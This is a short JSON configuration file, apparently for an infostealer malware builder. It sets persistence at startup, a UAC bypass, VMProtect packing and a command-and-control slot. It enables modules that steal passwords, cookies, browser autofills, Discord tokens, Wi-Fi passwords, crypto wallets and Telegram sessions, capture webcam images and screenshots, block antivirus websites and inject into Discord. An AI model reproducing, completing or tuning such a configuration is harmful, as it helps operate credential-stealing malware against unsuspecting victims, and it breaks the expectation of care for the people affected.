{
    "settings" : {
        "c2" : [0, ""],
        "mutex" : "",
        "pingme" : true,
        "vmprotect" : true,
        "startup" : true,
        "melt" : false,
        "uacBypass" : true,
        "archivePassword" : "g0th",
        "consoleMode" : 0,
        "debug" : false,
        "pumpedStubSize" : 0,
        "boundFileRunOnStartup" : false
    },
    
    "modules" : {
        "captureWebcam" : true,
        "capturePasswords" : true,
        "captureCookies" : true,
        "captureHistory" : true,
        "captureAutofills" : true,
        "captureDiscordTokens" : true,
        "captureGames" : true,
        "captureWifiPasswords" : true,
        "captureSystemInfo" : true,
        "captureScreenshot" : true,
        "captureTelegramSession" : true,
        "captureCommonFiles" : true,
        "captureWallets" : true,

        "fakeError" : [false, ["title", "message", 0]],
        "blockAvSites" : true,
        "discordInjection" : true
    }
}